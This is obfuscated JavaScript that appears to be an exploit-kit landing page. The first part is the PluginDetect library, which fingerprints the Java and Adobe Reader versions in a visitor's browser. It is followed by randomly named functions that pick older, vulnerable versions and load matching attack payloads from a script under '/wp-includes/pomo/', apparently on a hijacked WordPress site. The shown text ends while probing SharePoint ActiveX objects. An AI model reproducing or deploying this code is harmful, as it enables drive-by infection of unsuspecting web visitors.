- valid: "fileStorageValid999",
- save: function (d, f, c) {
- var b = this,
- e = b.$,
- a;
- if (d && e.isDefined(c)) {
- if (!d[b.any]) {
- d[b.any] = []
- }
- if (!d[b.valid]) {
- d[b.valid] = []
- }
- d[b.any].push(c);
- a = b.split(f, c);
- if (a) {
- d[b.valid].push(a)
- }
- }
- },
- getValidLength: function (a) {
- return a && a[this.valid] ? a[this.valid].length : 0
- },
- getAnyLength: function (a) {
- return a && a[this.any] ? a[this.any].length : 0
- },
- getValid: function (c, a) {
- var b = this;
- return c && c[b.valid] ? b.get(c[b.valid], a) : null
- },
- getAny: function (c, a) {
- var b = this;
- return c && c[b.any] ? b.get(c[b.any], a) : null
- },
- get: function (d, a) {
- var c = d.length - 1,
- b = this.$.isNum(a) ? a : c;
- return (b < 0 || b > c) ? null : d[b]
- },
- split: function (g, c) {
- var b = this,
- e = b.$,
- f = null,
- a, d;
- g = g ? g.replace(".", "\\.") : "";
- d = new RegExp("^(.*[^\\/])(" + g + "\\s*)$");
- if (e.isString(c) && d.test(c)) {
- a = (RegExp.$1).split("/");
- f = {
- name: a[a.length - 1],
- ext: RegExp.$2,
- full: c
- };
- a[a.length - 1] = "";
- f.path = a.join("/")
- }
- return f
- },
- z: 0
- },
- Plugins: {
- java: {
- $: 1,
- mimeType: ["application/x-java-applet", "application/x-java-vm", "application/x-java-bean"],
- mimeType_dummy: "application/dummymimejavaapplet",
- classID: "clsid:8AD9C840-044E-11D1-B3E9-00805F499D93",
- classID_dummy: "clsid:8AD9C840-044E-11D1-B3E9-BA9876543210",
- navigator: {
- $: 1,
- a: (function () {
- var b, a = !0;
- try {
- a = window.navigator.javaEnabled()
- } catch (b) {}
- return a
- })(),
- javaEnabled: function () {
- return this.a
- },
- mimeObj: 0,
- pluginObj: 0
- },
- OTF: null,
- getVerifyTagsDefault: function () {
- return [1, this.applet.isDisabled.VerifyTagsDefault_1() ? 0 : 1, 1]
- },
- getVersion: function (j, g, i) {
- var b = this,
- d = b.$,
- e, a = b.applet,
- h = b.verify,
- k = b.navigator,
- f = null,
- l = null,
- c = null;
- if (b.getVersionDone === null) {
- b.OTF = 0;
- k.mimeObj = d.hasMimeType(b.mimeType);
- if (k.mimeObj) {
- k.pluginObj = k.mimeObj.enabledPlugin
- }
- if (h) {
- h.begin()
- }
- }
- a.setVerifyTagsArray(i);
- d.file.save(b, ".jar", g);
- if (b.getVersionDone === 0) {
- if (a.should_Insert_Query_Any()) {
- e = a.insert_Query_Any(j);
- b.setPluginStatus(e[0], e[1], f, j)
- }
- return
- }
- if ((!f || d.dbug) && b.navMime.query().version) {
- f = b.navMime.version
- }
- if ((!f || d.dbug) && b.DTK.query(d.dbug).version) {
- f = b.DTK.version
- }
- if ((!f || d.dbug) && b.navPlugin.query().version) {
- f = b.navPlugin.version
- }
- if (b.nonAppletDetectionOk(f)) {
- c = f
- }
- b.setPluginStatus(c, l, f, j);
- if (a.should_Insert_Query_Any()) {
- e = a.insert_Query_Any(j);
- if (e[0]) {
- c = e[0];
- l = e[1]
- }
- }
- b.setPluginStatus(c, l, f, j)
- },
- nonAppletDetectionOk: function (b) {
- var d = this,
- e = d.$,
- a = d.navigator,
- c = 1;
- if (!b || !a.javaEnabled() || (!e.isIE && !a.mimeObj) || (e.isIE && !e.ActiveXEnabled)) {
- c = 0
- } else {
- if (e.OS >= 20) {} else {
- if (d.info && d.info.getPlugin2Status() < 0 && d.info.BrowserRequiresPlugin2()) {
- c = 0
- }
- }
- }
- return c
- },
- setPluginStatus: function (d, i, g, h) {
- var b = this,
- e = b.$,
- f, c = 0,
- a = b.applet;
- g = g || b.version0;
- f = a.isRange(d);
- if (f) {
- if (a.setRange(f, h) == d) {
- c = f
- }
- d = 0
- }
- if (b.OTF < 3) {
- b.installed = c ? (c > 0 ? 0.7 : -0.1) : (d ? 1 : (g ? -0.2 : -1))
- }
- if (b.OTF == 2 && b.NOTF && !b.applet.getResult()[0]) {
- b.installed = g ? -0.2 : -1
- }
- if (b.OTF == 3 && b.installed != -0.5 && b.installed != 0.5) {
- b.installed = (b.NOTF.isJavaActive(1) == 1 ? 0.5 : -0.5)
- }
- if (b.OTF == 4 && (b.installed == -0.5 || b.installed == 0.5)) {
- if (d) {
- b.installed = 1
- } else {
- if (c) {
- b.installed = c > 0 ? 0.7 : -0.1
- } else {
- if (b.NOTF.isJavaActive(1) == 1) {
- if (g) {
- b.installed = 1;
- d = g
- } else {
- b.installed = 0
- }
- } else {
- if (g) {
- b.installed = -0.2
- } else {
- b.installed = -1
- }
- }
- }
- }
- }
- if (g) {
- b.version0 = e.formatNum(e.getNum(g))
- }
- if (d && !c) {
- b.version = e.formatNum(e.getNum(d))
- }
- if (i && e.isString(i)) {
- b.vendor = i
- }
- if (!b.vendor) {
- b.vendor = ""
- }
- if (b.verify && b.verify.isEnabled()) {
- b.getVersionDone = 0
- } else {
- if (b.getVersionDone != 1) {
- if (b.OTF < 2) {
- b.getVersionDone = 0
- } else {
- b.getVersionDone = b.applet.can_Insert_Query_Any() ? 0 : 1
- }
- }
- };
- e.codebase.emptyGarbage()
- },
- DTK: {
- $: 1,
- hasRun: 0,
- status: null,
- VERSIONS: [],
- version: "",
- HTML: null,
- Plugin2Status: null,
- classID: ["clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA", "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA"],
- mimeType: ["application/java-deployment-toolkit", "application/npruntime-scriptable-plugin;DeploymentToolkit"],
- isDisabled: function (a) {
- var b = this,
- c = b.$;
- if (!a && (!c.DOM.isEnabled.objectTag() || (c.isIE && c.verIE < 6) || (c.isGecko && c.compareNums(c.verGecko, c.formatNum("1.6")) <= 0) || (c.isSafari && c.OS == 1 && (!c.verSafari || c.compareNums(c.verSafari, "5,1,0,0") < 0)) || c.isChrome)) {
- return 1
- }
- return 0
- },
- query: function (n) {
- var l = this,
- h = l.$,
- f = l.$$,
- k, m, i, a = h.DOM.altHTML,
- g = {}, b, d = null,
- j = null,
- c = (l.hasRun || l.isDisabled(n));
- l.hasRun = 1;
- if (c) {
- return l
- }
- l.status = 0;
- if (h.isIE) {
- for (m = 0; m < l.classID.length; m++) {
- l.HTML = h.DOM.insert("object", ["classid", l.classID[m]], [], a);
- d = l.HTML.obj();
- if (h.getPROP(d, "jvms")) {
- break
- }
- }
- } else {
- i = h.hasMimeType(l.mimeType);
- if (i && i.type) {
- l.HTML = h.DOM.insert("object", ["type", i.type], [], a);
- d = l.HTML.obj()
- }
- } if (d) {
- try {
- b = h.getPROP(d, "jvms");
- if (b) {
- j = b.getLength();
- if (h.isNum(j)) {
- l.status = j > 0 ? 1 : -1;
- for (m = 0; m < j; m++) {
- i = h.getNum(b.get(j - 1 - m).version);
- if (i) {
- l.VERSIONS.push(i);
- g["a" + h.formatNum(i)] = 1
- }
- }
- }
- }
- } catch (k) {}
- }
- i = 0;
- for (m in g) {
- i++
- }
- if (i && i !== l.VERSIONS.length) {
- l.VERSIONS = []
- }
- if (l.VERSIONS.length) {
- l.version = h.formatNum(l.VERSIONS[0])
- };
- return l
- }
- },
- navMime: {
- $: 1,
- hasRun: 0,
- mimetype: "",
- version: "",
- length: 0,
- mimeObj: 0,
- pluginObj: 0,
- isDisabled: function () {
- var b = this,
- d = b.$,
- c = b.$$,
- a = c.navigator;
- if (d.isIE || !a.mimeObj || !a.pluginObj) {
- return 1
- }
- return 0
- },
- query: function () {
- var i = this,
- f = i.$,
- a = i.$$,
- b = (i.hasRun || i.isDisabled());
- i.hasRun = 1;
- if (b) {
- return i
- };
- var n = /^\s*application\/x-java-applet;jpi-version\s*=\s*(\d.*)$/i,
- g, l, j, d = "",
- h = "a",
- o, m, k = {}, c = f.formatNum("0");
- for (l = 0; l < navigator.mimeTypes.length; l++) {
- o = navigator.mimeTypes[l];
- m = o ? o.enabledPlugin : 0;
- g = o && n.test(o.type || d) ? f.formatNum(f.getNum(RegExp.$1)) : 0;
- if (g && m && (m.description || m.name)) {
- if (!k[h + g]) {
- i.length++
- }
- k[h + g] = o.type;
- if (f.compareNums(g, c) > 0) {
- c = g
- }
- }
- }
- g = k[h + c];
- if (g) {
- o = f.hasMimeType(g);
- i.mimeObj = o;
- i.pluginObj = o ? o.enabledPlugin : 0;
- i.mimetype = g;
- i.version = c
- };
- return i
- }
- },
- navPlugin: {
- $: 1,
- hasRun: 0,
- version: "",
- isDisabled: function () {
- var d = this,
- c = d.$,
- b = d.$$,
- a = b.navigator;
- if (c.isIE || !a.mimeObj || !a.pluginObj) {
- return 1
- }
- return 0
- },
- query: function () {
- var m = this,
- e = m.$,
- c = m.$$,
- h = c.navigator,
- j, l, k, g, d, a, i, f = 0,
- b = (m.hasRun || m.isDisabled());
- m.hasRun = 1;
- if (b) {
- return m
- };
- a = h.pluginObj.name || "";
- i = h.pluginObj.description || "";
- if (!f || e.dbug) {
- g = /Java.*TM.*Platform[^\d]*(\d+)(?:[\.,_](\d*))?(?:\s*[Update]+\s*(\d*))?/i;
- if ((g.test(a) || g.test(i)) && parseInt(RegExp.$1, 10) >= 5) {
- f = "1," + RegExp.$1 + "," + (RegExp.$2 ? RegExp.$2 : "0") + "," + (RegExp.$3 ? RegExp.$3 : "0")
- }
- }
- if (!f || e.dbug) {
- g = /Java[^\d]*Plug-in/i;
- l = g.test(i) ? e.formatNum(e.getNum(i)) : 0;
- k = g.test(a) ? e.formatNum(e.getNum(a)) : 0;
- if (l && (e.compareNums(l, e.formatNum("1,3")) < 0 || e.compareNums(l, e.formatNum("2")) >= 0)) {
- l = 0
- }
- if (k && (e.compareNums(k, e.formatNum("1,3")) < 0 || e.compareNums(k, e.formatNum("2")) >= 0)) {
- k = 0
- }
- d = l && k ? (e.compareNums(l, k) > 0 ? l : k) : (l || k);
- if (d) {
- f = d
- }
- }
- if (!f && e.isSafari && e.OS == 2) {
- j = e.findNavPlugin("Java.*\\d.*Plug-in.*Cocoa", 0);
- if (j) {
- l = e.getNum(j.description);
- if (l) {
- f = l
- }
- }
- };
- if (f) {
- m.version = e.formatNum(f)
- };
- return m
- }
- },
- applet: {
- $: 1,
- codebase: {
- $: 1,
- isMin: function (a) {
- return this.$.codebase.isMin(this, a)
- },
- search: function () {
- return this.$.codebase.search(this)
- },
- ParamTags: '<param name="code" value="A19999.class" /><param name="codebase_lookup" value="false" />',
- DIGITMAX: [
- [16, 64],
- [6, 0, 512], 0, [1, 5, 2, 256], 0, [1, 4, 1, 1],
- [1, 4, 0, 64],
- [1, 3, 2, 32]
- ],
- DIGITMIN: [1, 0, 0, 0],
- Upper: ["999", "10", "5,0,20", "1,5,0,20", "1,4,1,20", "1,4,1,2", "1,4,1", "1,4"],
- Lower: ["10", "5,0,20", "1,5,0,20", "1,4,1,20", "1,4,1,2", "1,4,1", "1,4", "0"],
- convert: [
- function (b, a) {
- return a ? [parseInt(b[0], 10) > 1 ? "99" : parseInt(b[1], 10) + 3 + "", b[3], "0", "0"] : ["1", parseInt(b[0], 10) - 3 + "", "0", b[1]]
- },
- function (b, a) {
- return a ? [b[1], b[2], b[3] + "0", "0"] : ["1", b[0], b[1], b[2].substring(0, b[2].length - 1 || 1)]
- },
- 0,
- function (b, a) {
- return a ? [b[0], b[1], b[2], b[3] + "0"] : [b[0], b[1], b[2], b[3].substring(0, b[3].length - 1 || 1)]
- },
- 0, 1,
- function (b, a) {
- return a ? [b[0], b[1], b[2], b[3] + "0"] : [b[0], b[1], b[2], b[3].substring(0, b[3].length - 1 || 1)]
- },
- 1
- ]
- },
- results: [
- [null, null],
- [null, null],
- [null, null],
- [null, null]
- ],
- getResult: function () {
- var b = this,
- d = b.results,
- a, c = [];
- for (a = d.length - 1; a >= 0; a--) {
- c = d[a];
- if (c[0]) {
- break
- }
- }
- c = [].concat(c);
- return c
- },
- DummySpanTagHTML: 0,
- HTML: [0, 0, 0, 0],
- active: [0, 0, 0, 0],
- DummyObjTagHTML: 0,
- DummyObjTagHTML2: 0,
- allowed: [1, 1, 1, 1],
- VerifyTagsHas: function (c) {
- var d = this,
- b;
- for (b = 0; b < d.allowed.length; b++) {
- if (d.allowed[b] === c) {
- return 1
- }
- }
- return 0
- },
- saveAsVerifyTagsArray: function (c) {
- var b = this,
- d = b.$,
- a;
- if (d.isArray(c)) {
- for (a = 1; a < b.allowed.length; a++) {
- if (c.length > a - 1 && d.isNum(c[a - 1])) {
- if (c[a - 1] < 0) {
- c[a - 1] = 0
- }
- if (c[a - 1] > 3) {
- c[a - 1] = 3
- }
- b.allowed[a] = c[a - 1]
- }
- }
- b.allowed[0] = b.allowed[3]
- }
- },
- setVerifyTagsArray: function (d) {
- var b = this,
- c = b.$,
- a = b.$$;
- if (a.getVersionDone === null) {
- b.saveAsVerifyTagsArray(a.getVerifyTagsDefault())
- }
- if (c.dbug) {
- b.saveAsVerifyTagsArray([3, 3, 3])
- } else {
- if (d) {
- b.saveAsVerifyTagsArray(d)
- }
- }
- },
- isDisabled: {
- $: 1,
- single: function (d) {
- var a = this,
- c = a.$,
- b = a.$$;
- if (d == 0) {
- return c.codebase.isDisabled()
- }
- if ((d == 3 && !c.isIE) || a.all()) {
- return 1
- }
- if (d == 1 || d == 3) {
- return !c.DOM.isEnabled.objectTag()
- }
- if (d == 2) {
- return a.AppletTag()
- }
- },
- aA_: null,
- all: function () {
- var c = this,
- e = c.$,
- d = c.$$,
- b = d.navigator,
- a = 0;
- if (c.aA_ === null) {
- if (e.OS >= 20) {
- a = 0
- } else {
- if (e.verOpera && e.verOpera < 11 && !b.javaEnabled()) {
- a = 1
- } else {
- if ((e.verGecko && e.compareNums(e.verGecko, e.formatNum("2")) < 0) && !b.mimeObj) {
- a = 1
- } else {
- if (c.AppletTag() && !e.DOM.isEnabled.objectTag()) {
- a = 1
- }
- }
- }
- };
- c.aA_ = a
- }
- return c.aA_
- },
- AppletTag: function () {
- var b = this,
- d = b.$,
- c = b.$$,
- a = c.navigator;
- return d.isIE ? !a.javaEnabled() : 0
- },
- VerifyTagsDefault_1: function () {
- var a = this.$;
- if (a.OS >= 20) {
- return 1
- }
- if ((a.isIE && (a.verIE < 9 || !a.ActiveXEnabled)) || (a.verGecko && a.compareNums(a.verGecko, a.formatNum("2")) < 0) || (a.isSafari && (!a.verSafari || a.compareNums(a.verSafari, a.formatNum("4")) < 0)) || (a.verOpera && a.verOpera < 10)) {
- return 0
- }
- return 1
- },
- z: 0
- },
- can_Insert_Query: function (d) {
- var b = this,
- c = b.results[0][0],
- a = b.getResult()[0];
- if (b.HTML[d] || (d == 0 && c !== null && !b.isRange(c)) || (d == 0 && a && !b.isRange(a))) {
- return 0
- }
- return !b.isDisabled.single(d)
- },
- can_Insert_Query_Any: function () {
- var b = this,
- a;
- for (a = 0; a < b.results.length; a++) {
- if (b.can_Insert_Query(a)) {
- return 1
- }
- }
- return 0
- },
- should_Insert_Query: function (e) {
- var c = this,
- f = c.allowed,
- d = c.$,
- b = c.$$,
- a = c.getResult()[0];
- a = a && (e > 0 || !c.isRange(a));
- if (!c.can_Insert_Query(e) || f[e] === 0) {
- return 0
- }
- if (f[e] == 3 || (f[e] == 2.8 && !a)) {
- return 1
- }
- if (!b.nonAppletDetectionOk(b.version0)) {
- if (f[e] == 2 || (f[e] == 1 && !a)) {
- return 1
- }
- }
- return 0
- },
- should_Insert_Query_Any: function () {
- var b = this,
- a;
- for (a = 0; a < b.allowed.length; a++) {
- if (b.should_Insert_Query(a)) {
- return 1
- }
- }
- return 0
- },
- query: function (f) {
- var j, a = this,
- i = a.$,
- d = a.$$,
- k = null,
- l = null,
- b = a.results,
- c, h, g = a.HTML[f];
- if (!g || !g.obj() || b[f][0] || d.bridgeDisabled || (i.dbug && d.OTF < 3)) {
- return
- }
- c = g.obj();
- h = g.readyState();
- if (!i.isIE || h === 4) {
- try {
- k = i.getNum(c.getVersion() + "");
- l = c.getVendor() + "";
- c.statusbar(i.win.loaded ? " " : " ")
- } catch (j) {};
- if (k && i.isStrNum(k)) {
- b[f] = [k, l];
- a.active[f] = 2
- }
- }
- },
- isRange: function (a) {
- return (/^[<>]/).test(a || "") ? (a.charAt(0) == ">" ? 1 : -1) : 0
- },
- setRange: function (b, a) {
- return (b ? (b > 0 ? ">" : "<") : "") + (this.$.isString(a) ? a : "")
- },
- insertJavaTag: function (g, n, h, o, m) {
- var e = this,
- c = e.$,
- k = e.$$,
- r = "A.class",
- b = c.file.getValid(k),
- f = b.name + b.ext,
- q = b.path;
- var i = ["archive", f, "code", r],
- l = (o ? ["width", o] : []).concat(m ? ["height", m] : []),
- j = ["mayscript", "true"],
- p = ["scriptable", "true", "codebase_lookup", "false"].concat(j),
- a = k.navigator,
- d = !c.isIE && a.mimeObj && a.mimeObj.type ? a.mimeObj.type : k.mimeType[0];
- if (g == 1) {
- return c.isIE ? c.DOM.insert("object", ["type", d].concat(l), ["codebase", q].concat(i).concat(p), h, k, 0, n) : c.DOM.insert("object", ["type", d].concat(l), ["codebase", q].concat(i).concat(p), h, k, 0, n)
- }
- if (g == 2) {
- return c.isIE ? c.DOM.insert("applet", ["alt", h].concat(j).concat(i).concat(l), ["codebase", q].concat(p), h, k, 0, n) : c.DOM.insert("applet", ["codebase", q, "alt", h].concat(j).concat(i).concat(l), [].concat(p), h, k, 0, n)
- }
- if (g == 3) {
- return c.isIE ? c.DOM.insert("object", ["classid", k.classID].concat(l), ["codebase", q].concat(i).concat(p), h, k, 0, n) : c.DOM.insert()
- }
- if (g == 4) {
- return c.DOM.insert("embed", ["codebase", q].concat(i).concat(["type", d]).concat(p).concat(l), [], h, k, 0, n)
- }
- },
- insert_Query_Any: function (i) {
- var b = this,
- d = b.$,
- c = b.$$,
- g = b.results,
- j = b.HTML,
- a = d.DOM.altHTML,
- e, h = d.file.getValid(c);
- if (b.should_Insert_Query(0)) {
- if (c.OTF < 2) {
- c.OTF = 2
- };
- g[0] = [0, 0];
- e = i ? b.codebase.isMin(i) : b.codebase.search();
- if (e) {
- g[0][0] = i ? b.setRange(e, i) : e
- }
- b.active[0] = e ? 1.5 : -1
- }
- if (!h) {
- return b.getResult()
- }
- if (!b.DummySpanTagHTML) {
- b.DummySpanTagHTML = d.DOM.insert("", [], [], a)
- }
- if (b.should_Insert_Query(1)) {
- if (c.OTF < 2) {
- c.OTF = 2
- };
- j[1] = b.insertJavaTag(1, 0, a);
- g[1] = [0, 0];
- b.query(1)
- }
- if (b.should_Insert_Query(2)) {
- if (c.OTF < 2) {
- c.OTF = 2
- };
- j[2] = b.insertJavaTag(2, 0, a);
- g[2] = [0, 0];
- b.query(2)
- }
- if (b.should_Insert_Query(3)) {
- if (c.OTF < 2) {
- c.OTF = 2
- };
- j[3] = b.insertJavaTag(3, 0, a);
- g[3] = [0, 0];
- b.query(3)
- }
- if (d.DOM.isEnabled.objectTag()) {
- if (!b.DummyObjTagHTML && (j[1] || j[2])) {
- b.DummyObjTagHTML = d.DOM.insert("object", ["type", c.mimeType_dummy], [], a)
- }
- if (!b.DummyObjTagHTML2 && j[3]) {
- b.DummyObjTagHTML2 = d.DOM.insert("object", ["classid", c.classID_dummy], [], a)
- }
- }
- var f = c.NOTF;
- if (c.OTF < 3 && f.shouldContinueQuery()) {
- c.OTF = 3;
- f.onIntervalQuery = d.ev.handler(f.$$onIntervalQuery, f);
- if (!d.win.loaded) {
- d.win.funcs0.push([f.winOnLoadQuery, f])
- }
- setTimeout(f.onIntervalQuery, f.intervalLength)
- }
- return b.getResult()
- }
- },
- NOTF: {
- $: 1,
- count: 0,
- countMax: 25,
- intervalLength: 250,
- shouldContinueQuery: function () {
- var f = this,
- e = f.$,
- c = f.$$,
- b = c.applet,
- a, d = 0;
- if (e.win.loaded && f.count > f.countMax) {
- return 0
- }
- for (a = 0; a < b.results.length; a++) {
- if (b.HTML[a]) {
- if (!e.win.loaded && f.count > f.countMax && e.codebase.checkGarbage(b.HTML[a].span)) {
- d = 1;
- b.HTML[a].DELETE = 1
- }
- if (!d && !b.results[a][0] && (b.allowed[a] >= 2 || (b.allowed[a] == 1 && !b.getResult()[0])) && f.isAppletActive(a) >= 0) {
- return 1
- }
- }
- };
- return 0
- },
- isJavaActive: function (d) {
- var f = this,
- c = f.$$,
- a, b, e = -9;
- for (a = 0; a < c.applet.HTML.length; a++) {
- b = f.isAppletActive(a, d);
- if (b > e) {
- e = b
- }
- }
- return e
- },
- isAppletActive: function (e, g) {
- var h = this,
- f = h.$,
- b = h.$$,
- l = b.navigator,
- a = b.applet,
- i = a.HTML[e],
- d = a.active,
- k, c = 0,
- j, m = d[e];
- if (g || m >= 1.5 || !i || !i.span) {
- return m
- };
- j = f.DOM.getTagStatus(i, a.DummySpanTagHTML, a.DummyObjTagHTML, a.DummyObjTagHTML2, h.count);
- for (k = 0; k < d.length; k++) {
- if (d[k] > 0) {
- c = 1
- }
- }
- if (j != 1) {
- m = j
- } else {
- if (f.isIE || (b.version0 && l.javaEnabled() && l.mimeObj && (i.tagName == "object" || c))) {
- m = 1
- } else {
- m = 0
- }
- }
- d[e] = m;
- return m
- },
- winOnLoadQuery: function (c, d) {
- var b = d.$$,
- a;
- if (b.OTF == 3) {
- a = d.queryAllApplets();
- d.queryCompleted(a)
- }
- },
- $$onIntervalQuery: function (d) {
- var c = d.$,
- b = d.$$,
- a;
- if (b.OTF == 3) {
- a = d.queryAllApplets();
- if (!d.shouldContinueQuery()) {
- d.queryCompleted(a)
- }
- }
- d.count++;
- if (b.OTF == 3) {
- setTimeout(d.onIntervalQuery, d.intervalLength)
- }
- },
- queryAllApplets: function () {
- var f = this,
- e = f.$,
- d = f.$$,
- c = d.applet,
- b, a;
- for (b = 0; b < c.results.length; b++) {
- c.query(b)
- }
- a = c.getResult();
- return a
- },
- queryCompleted: function (c) {
- var g = this,
- f = g.$,
- e = g.$$,
- d = e.applet,
- b;
- if (e.OTF >= 4) {
- return
- }
- e.OTF = 4;
- var a = g.isJavaActive();
- for (b = 0; b < d.HTML.length; b++) {
- if (d.HTML[b] && d.HTML[b].DELETE) {
- f.DOM.emptyNode(d.HTML[b].span);
- d.HTML[b].span = null
- }
- }
- e.setPluginStatus(c[0], c[1], 0);
- if (f.onDetectionDone && e.funcs) {
- f.ev.callArray(e.funcs)
- }
- if (f.DOM) {
- f.DOM.onDoneEmptyDiv()
- }
- }
- },
- zz: 0
- },
- adobereader: {
- $: 1,
- setPluginStatus: function () {
- var d = this,
- b = d.$,
- a = d.navPlugin.detected,
- e = d.navPlugin.version,
- g = d.axo.detected,
- c = d.axo.version,
- i = d.doc.detected,
- h = d.doc.version,
- f = e || c || h || null;
- d.installed = f ? 1 : (a > 0 || g > 0 || i > 0 ? 0 : (i == -0.5 ? -0.15 : (b.isIE && (!b.ActiveXEnabled || b.ActiveXFilteringEnabled) ? -1.5 : -1)));
- d.version = b.formatNum(f)
- },
- getVersion: function (c, e) {
- var a = this,
- d = a.$,
- b = 0;
- if ((!b || d.dbug) && a.navPlugin.query().detected > 0) {
- b = 1
- }
- if ((!b || d.dbug) && a.axo.query().detected > 0) {
- b = 1
- }
- if ((!b || d.dbug) && (a.doc.query().detected > 0 || a.doc.detected == -0.5)) {
- b = 1
- }
- a.setPluginStatus()
- },
- navPlugin: {
- $: 1,
- detected: 0,
- version: null,
- mimeType: "application/pdf",
- isDisabled: function () {
- var c = this,
- b = c.$,
- a = c.$$;
- return b.isIE || c.detected || !b.hasMimeType(c.mimeType) ? 1 : 0
- },
- attempt3: function () {
- var c = this,
- b = c.$,
- a = null;
- if (b.OS == 1) {
- if (b.hasMimeType("application/vnd.adobe.pdfxml")) {
- a = "9"
- } else {
- if (b.hasMimeType("application/vnd.adobe.x-mars")) {
- a = "8"
- } else {
- if (b.hasMimeType("application/vnd.adobe.xfdf")) {
- a = "6"
- }
- }
- }
- }
- return a
- },
- query: function () {
- var d = this,
- c = d.$,
- a = d.$$,
- f, e, b = null;
- if (d.isDisabled()) {
- return d
- };
- f = "Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in";
- e = c.findNavPlugin(f, 0);
- d.detected = e ? 1 : -1;
- if (e) {
- b = c.getNum(e.description) || c.getNum(e.name);
- b = c.getPluginFileVersion(e, b);
- if (!b) {
- b = d.attempt3()
- }
- }
- if (b) {
- d.version = b
- };
- return d
- }
- },
- pluginQuery: function (j) {
- var f = this,
- d = f.$,
- b = "",
- h = null,
- g, a, i, c;
- try {
- if (j) {
- b = j.GetVersions()
- }
- } catch (g) {}
- if (b && d.isString(b)) {
- a = /=\s*([\d\.]+)/g;
- for (i = 0; i < 30; i++) {
- if (a.test(b)) {
- c = d.formatNum(RegExp.$1);
- if (!h || d.compareNums(c > h) > 0) {
- h = c
- }
- } else {
- break
- }
- }
- }
- return h
- },
- axo: {
- $: 1,
- detected: 0,
- version: null,
- progID: ["AcroPDF.PDF", "AcroPDF.PDF.1", "PDF.PdfCtrl", "PDF.PdfCtrl.5", "PDF.PdfCtrl.1"],
- isDisabled: function () {
- var b = this,
- c = b.$,
- a = b.$$;
- return c.isIE && !b.detected ? 0 : 1
- },
- query: function () {
- var d = this,
- e = d.$,
- b = d.$$,
- f = 0,
- c = null,
- a;
- if (d.isDisabled()) {
- return d
- };
- for (a = 0; a < d.progID.length; a++) {
- f = e.getAXO(d.progID[a]);
- if (f) {
- d.detected = 1;
- c = b.pluginQuery(f);
- if (!e.dbug && c) {
- break
- }
- }
- }
- d.version = c ? c : null;
- if (d.detected === 0) {
- d.detected = -1
- };
- return d
- }
- },
- doc: {
- $: 1,
- detected: 0,
- version: null,
- classID: "clsid:CA8A9780-280D-11CF-A24D-444553540000",
- classID_dummy: "clsid:CA8A9780-280D-11CF-A24D-BA9876543210",
- DummySpanTagHTML: 0,
- HTML: 0,
- DummyObjTagHTML1: 0,
- DummyObjTagHTML2: 0,
- isDisabled: function () {
- var c = this,
- b = c.$,
- a = 0;
- if (c.detected) {
- a = 1
- } else {
- if (b.dbug) {} else {
- if (!b.isIE || !b.DOM.isEnabled.objectTag()) {
- a = 1
- }
- }
- }
- return a
- },
- query: function () {
- var i = this,
- d = i.$,
- f = i.$$,
- h = null,
- a = d.DOM.altHTML,
- g = null,
- c = 1,
- e = 1,
- b;
- if (i.isDisabled()) {
- return i
- };
- if (!i.DummySpanTagHTML) {
- i.DummySpanTagHTML = d.DOM.insert("", [], [], a, f, e)
- }
- if (!i.HTML) {
- i.HTML = d.DOM.insert("object", ["classid", i.classID], [], a, f, e)
- }
- if (!i.DummyObjTagHTML2) {
- i.DummyObjTagHTML2 = d.DOM.insert("object", ["classid", i.classID_dummy], [], a, f, e)
- }
- b = d.DOM.getTagStatus(i.HTML, i.DummySpanTagHTML, i.DummyObjTagHTML1, i.DummyObjTagHTML2, g, c);
- h = f.pluginQuery(i.HTML.obj());
- i.detected = b > 0 || h ? 1 : (b == -0.1 || b == -0.5 ? -0.5 : -1);
- i.version = h ? h : null;
- return i
- }
- }
- },
- zz: 0
- }
- };
- PluginDetect.INIT();
- function PcyjjcB(QXRwqr) {
- var NxZFu = PluginDetect.getVersion(QXRwqr);
- if (NxZFu != null) {
- return DzIEPNhc(NxZFu);
- } else {
- return null;
- }
- }
- function ipzPNmQxc(QEzGR) {
- if (QEzGR != null) {
- var BZIMlJFt = parseFloat(QEzGR[1] + "." + QEzGR[3]);
- if (QEzGR[0] == 1 && BZIMlJFt <= 6.32) {
- TQGRXSEi();
- } else if (QEzGR[0] == 1 && BZIMlJFt <= 7.17) {
- IuJKUxe();
- } /*else{IuJKUxe();}*/
- }
- }
- function nekTVLCFu() {
- PXTLS('/wp-includes/pomo/dtsrc.php?a=h5', 'text/html');
- }
- function IuJKUxe() {
- PXTLS('/wp-includes/pomo/dtsrc.php?a=h2', 'text/html');
- }
- function DzIEPNhc(NxZFu) {
- var MRZvEcxG = new Array;
- try {
- MRZvEcxG = NxZFu.split(',');
- for (jBxaKE = 0; jBxaKE < MRZvEcxG.size; jBxaKE++) {
- MRZvEcxG[jBxaKE] = parseFloat(MRZvEcxG[jBxaKE]);
- }
- } catch (BeerBZu) {
- return null;
- }
- return MRZvEcxG;
- }
- function vZfpbBKzh() {
- PXTLS('/wp-includes/pomo/dtsrc.php?a=h3', 'text/html');
- }
- function pPDjhQv() {
- return;
- }
- function eeguOzpz(UyEllYwYss) {
- if (UyEllYwYss != null) {
- var BZIMlJFt = parseFloat(UyEllYwYss[1] + "." + UyEllYwYss[2]);
- if (UyEllYwYss[0] == 9 && BZIMlJFt <= 3.4) {
- VcXjat();
- }
- if (UyEllYwYss[0] == 9 && BZIMlJFt <= 4.0) {
- pPDjhQv();
- } else if (UyEllYwYss[0] < 9) {
- pPDjhQv();
- }
- if (UyEllYwYss[0] == 10 && UyEllYwYss[1] == 1) {
- YjGGR();
- } /*else{pPDjhQv();}*/
- }
- }
- function fPVoBak() {
- var WLtIYJZDWQQ = UIlKdBdnO();
- if (WLtIYJZDWQQ != null) {
- if (WLtIYJZDWQQ == 'msie') {
- try {
- return parseFloat(CzdxtSXz.match(/msie ([\d]+)\.[\d]+/)[1]);
- } catch (BeerBZu) {
- return null;
- }
- }
- if (WLtIYJZDWQQ == 'firefox') {
- try {
- return parseFloat(CzdxtSXz.match(/firefox\/([\d]+)\.[\d]+/)[1]);
- } catch (BeerBZu) {
- return null;
- }
- }
- }
- return null;
- }
- function YQnBLMyY() {
- PXTLS('/wp-includes/pomo/dtsrc.php?a=h6', 'text/html');
- }
- function PPnprFkcx() {
- var znQAdpi = 0;
- var IGwyvnqihKC = 0;
- try {
- znQAdpi = new ActiveXObject("SharePoint.OpenDocuments.4");
- } catch (e) {}
- try {
- IGwyvnqihKC = new ActiveXObject("SharePoint.OpenDocuments.3");
- } catch (e) {}
